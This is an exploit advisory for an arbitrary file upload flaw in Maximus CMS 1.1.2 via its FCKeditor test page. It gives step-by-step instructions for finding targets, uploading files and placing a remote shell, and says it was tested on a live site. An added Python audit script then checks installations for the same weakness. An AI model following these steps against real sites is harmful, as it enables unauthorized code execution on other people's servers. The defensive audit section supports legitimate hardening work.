/===============================================================================\
 Exploit Title: maximus-cms (fckeditor) Arbitrary File Upload Vulnerability
 develop: http://www.php-maximus.org
 Version: Maximus 2008 CMS: Web Portal System (v.1.1.2)
 Tested On: Live site
 Dork: use your skill and play your imagination :P
 Author: eidelweiss
 contact: eidelweiss[at]windowslive[dot]com
 Home: http://www.eidelweiss.info
\===============================================================================/
   NOTHING IMPOSSIBLE IN THIS WORLD EVEN NOBODY`s PERFECT
---------------------------------------------------------------------------------

|============================================================================================|
|Original advisories:                                                                        |
|http://eidelweiss-advisories.blogspot.com/2011/01/maximus-cms-fckeditor-arbitrary-file.html |
|============================================================================================|

exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html

[!] first find the target host
    ex: www.site.com or www.target.com/maximus
    then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#

[!] select # "php" as "File Uploader" to use... and select "file" as Resource Type

[!] Upload Hacked.txt or whatever.txt there and copy the output link, or

[!] after upload without any errors your file will be here: /FCKeditor/upload/
    ex: http://site.com//FCKeditor/upload/whatever.txt

NB: remote shell upload also possible !!!

Read the config.php file in "/FCKeditor/editor/filemanager/connectors/php/"

----------
$Config['Enabled'] = true ; // <=
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/FCKeditor/upload/' ;
----------

and also $Config['AllowedExtensions']['File']

With a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code, because multiple file extensions are not properly checked.

=========================| -=[ E0F ]=- |=================================
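For administrators checking their own installation, the audit below is an added example, not part of the original advisory or of Maximus CMS. It looks for the three conditions described above: the uploadtest.html page still deployed, the PHP connector enabled in config.php, and files in /FCKeditor/upload/ that carry an executable extension in any position of the name. The function names, the extension list and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Assumed list of extensions a web server may pass to an interpreter; adjust to the server.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "asp", "aspx", "jsp"}
# Matches an active (not commented-out) $Config['Enabled'] = true ; line.
ENABLED_RE = re.compile(r"""^\s*\$Config\[\s*['"]Enabled['"]\s*\]\s*=\s*true\s*;""", re.I | re.M)

def risky_name(filename):
    """True if ANY dot-separated segment after the base name is executable,
    so 'report.php.txt' is flagged as well as 'logo.PHP'."""
    return any(seg in EXECUTABLE_EXTS for seg in filename.lower().split(".")[1:])

def audit(webroot):
    """Return findings, in check order, for the conditions the advisory names."""
    fck = Path(webroot) / "FCKeditor"
    connectors = fck / "editor" / "filemanager" / "connectors"
    findings = []
    if (connectors / "uploadtest.html").is_file():
        findings.append("test-page-present: uploadtest.html")
    cfg = connectors / "php" / "config.php"
    if cfg.is_file() and ENABLED_RE.search(cfg.read_text(errors="replace")):
        findings.append("connector-enabled: php/config.php")
    upload = fck / "upload"
    if upload.is_dir():
        for p in sorted(upload.rglob("*")):
            if p.is_file() and risky_name(p.name):
                findings.append("risky-upload: " + p.relative_to(upload).as_posix())
    return findings

def build_sample(root):
    """Constructed sample tree that mirrors the paths quoted in the advisory."""
    conn = Path(root) / "FCKeditor" / "editor" / "filemanager" / "connectors"
    (conn / "php").mkdir(parents=True)
    (conn / "uploadtest.html").write_text("<html></html>")
    (conn / "php" / "config.php").write_text(
        "<?php\n$Config['Enabled'] = true ;\n"
        "$Config['UserFilesPath'] = '/FCKeditor/upload/' ;\n")
    upload = Path(root) / "FCKeditor" / "upload"
    upload.mkdir()
    for name in ("whatever.txt", "report.php.txt", "logo.PHP"):
        (upload / name).write_text("constructed sample")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print("\n".join(audit(tmp)))
```

Point `audit()` at the real document root instead of the sample tree; any finding is a reason to remove the test page, disable the connector, or review the upload directory.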